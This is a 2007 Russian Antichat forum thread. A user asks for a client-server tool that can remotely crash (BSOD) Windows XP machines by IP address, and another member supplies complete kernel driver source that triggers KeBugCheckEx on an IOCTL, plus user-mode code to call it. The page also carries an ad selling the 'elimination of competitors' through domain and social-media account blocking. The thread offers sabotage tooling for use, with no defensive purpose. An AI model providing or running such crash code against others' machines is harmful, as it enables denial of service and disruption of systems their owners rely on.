Форум АНТИЧАТ - Удаленный BSOD

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
Удаленный BSOD

Опции темы

Поиск в этой теме

Опции просмотра

Удаленный BSOD

22.03.2007, 23:14

Zitt

Познавший АНТИЧАТ

Регистрация: 07.05.2006

Сообщений: 1,031

Провел на форуме:
5885100

Репутация: 773

Отправить сообщение для Zitt с помощью ICQ

Удаленный BSOD

Возможно ли реализовать такое?
Вобшем надо прогу клиент-сервер чтоб удаолённо мона было вызывать BSOD на WinXPsp2 (без обнов)

23.03.2007, 01:12

_Great_

Флудер

Регистрация: 27.12.2005

Сообщений: 2,372

Провел на форуме:
5339610

Репутация: 4360

Отправить сообщение для _Great_ с помощью ICQ

а почему нет.
сервер + драйвер будут принимать запросы, драйвер будет вызываться и генерить бсод.
клиент будет слать запрос на бсод.

только вопрос - нафига?

23.03.2007, 01:32

Zitt

Познавший АНТИЧАТ

Регистрация: 07.05.2006

Сообщений: 1,031

Провел на форуме:
5885100

Репутация: 773

Цитата:

сервер + драйвер будут принимать запросы, драйвер будет вызываться и генерить бсод.
клиент будет слать запрос на бсод.

Можеш исходник накидать?
Да забыл сказать конект надо по Tcp/ip, типа вводиш ип жамкаеш кнопку и удалённая тачка в дауне.

Цитата:

только вопрос - нафига?

Нужно...

23.03.2007, 08:18

TaNkist

Участник форума

Регистрация: 06.04.2006

Сообщений: 257

Провел на форуме:
367179

Репутация: 76

В принципе если винда без обновлений, то можно просто на тачке какой-нибудь эксплоит , вызывающий BSoD, запускать. Но это не универсальный метод.
Драйвер убийца вместе с загрузчиком прилагаются к книжке Шнайбера Недокументированные возможности Windows 2000

23.03.2007, 17:43

_Great_

Флудер

Регистрация: 27.12.2005

Сообщений: 2,372

Провел на форуме:
5339610

Репутация: 4360

Че там писать то

Код:

#define _X86_
#include <ntddk.h>

UNICODE_STRING DeviceName;
UNICODE_STRING SymbolicLinkName;
PDEVICE_OBJECT deviceObject;

#define IOCTL_CRASH_SYSTEM      CTL_CODE( FILE_DEVICE_UNKNOWN, 0x01, METHOD_BUFFERED, FILE_ANY_ACCESS )
NTSTATUS DriverIoControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    PIO_STACK_LOCATION pisl     = IoGetCurrentIrpStackLocation(Irp);
	NTSTATUS           status   = STATUS_UNSUCCESSFUL;
	ULONG              BuffSize = pisl->Parameters.DeviceIoControl.InputBufferLength;
	PUCHAR             pBuff    = (PUCHAR)Irp->AssociatedIrp.SystemBuffer;

	Irp->IoStatus.Information = 0;

	if( pisl->Parameters.DeviceIoControl.IoControlCode == IOCTL_CRASH_SYSTEM )
		KeBugCheckEx( IRQL_NOT_LESS_OR_EQUAL, &KeBugCheckEx, HIGH_LEVEL, &KeBugCheck, &DbgPrint);

    Irp->IoStatus.Status = status;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;
}

NTSTATUS DriverCreateClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    Irp->IoStatus.Information = 0;
    Irp->IoStatus.Status = STATUS_SUCCESS;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

void DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
	IoDeleteSymbolicLink (&SymbolicLinkName);
	if(deviceObject)
		IoDeleteDevice (deviceObject);
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
	NTSTATUS status;

	RtlInitUnicodeString(&DeviceName, L"\\Device\\crashd");
    RtlInitUnicodeString(&SymbolicLinkName, L"\\DosDevices\\crashd");

	status = IoCreateDevice(DriverObject, 
		                    0, 
							&DeviceName, 
							FILE_DEVICE_UNKNOWN, 
							0, 
							TRUE, 
							&deviceObject);
	
	if (!NT_SUCCESS(status))
	{
		return STATUS_UNSUCCESSFUL;
	}
	
	deviceObject->Flags |= DO_BUFFERED_IO;
	status = IoCreateSymbolicLink(&SymbolicLinkName, &DeviceName);
	if (!NT_SUCCESS(status))
	{
		IoDeleteDevice(deviceObject);
		return STATUS_UNSUCCESSFUL;
	}
	DriverObject->DriverUnload = DriverUnload;
	DriverObject->MajorFunction [IRP_MJ_CREATE] =
          DriverObject->MajorFunction [IRP_MJ_CLOSE ] = DriverCreateClose;
          DriverObject->MajorFunction [IRP_MJ_DEVICE_CONTROL ] = DriverIoControl;

	return STATUS_SUCCESS;
}

Использовать примерно так в ринг3:

Код:

HANDLE hFile = CreateFile( "\\\\.\\crashd", GENERIC_READ, .... );
DeviceIoContol( hFile, IOCTL_CRASH_SYSTEM, 0, 0, ....);

Последний раз редактировалось _Great_; 23.03.2007 в 17:48..

23.03.2007, 22:53

Zitt

Познавший АНТИЧАТ

Регистрация: 07.05.2006

Сообщений: 1,031

Провел на форуме:
5885100

Репутация: 773

_Great_, пасиба большое...

23.03.2007, 23:39

_Great_

Флудер

Регистрация: 27.12.2005

Сообщений: 2,372

Провел на форуме:
5339610

Репутация: 4360

Надеюсь ты знаешь, что на момент вызова CreateFile драйвер должен быть уже загружен?

27.03.2007, 18:15

sn0w

Статус пользователя:

Регистрация: 26.07.2005

Сообщений: 568

Провел на форуме:
1290766

Репутация: 1236

нах вообще драйвер???????????? калгейт, епта и irql в смятку, правда попрет не дальше хрюшки

__________________

snow white world wide

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Os - моя крепость	Elekt	Избранное	32	06.08.2009 15:10
Ошибки Windows 2	SVipeR	Windows	9	02.03.2009 19:28
Подборка уязвимостей phpBB	-=ka$at1k=-	Форумы	3	02.07.2006 15:26
Удаленный рабочий стол	Dima-k17	Уязвимости	9	27.04.2006 19:35
Множественные уязвимости в Mozilla Firefox	c411k	Защита ОС: вирусы, антивирусы, файрволы.	25	25.04.2006 18:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход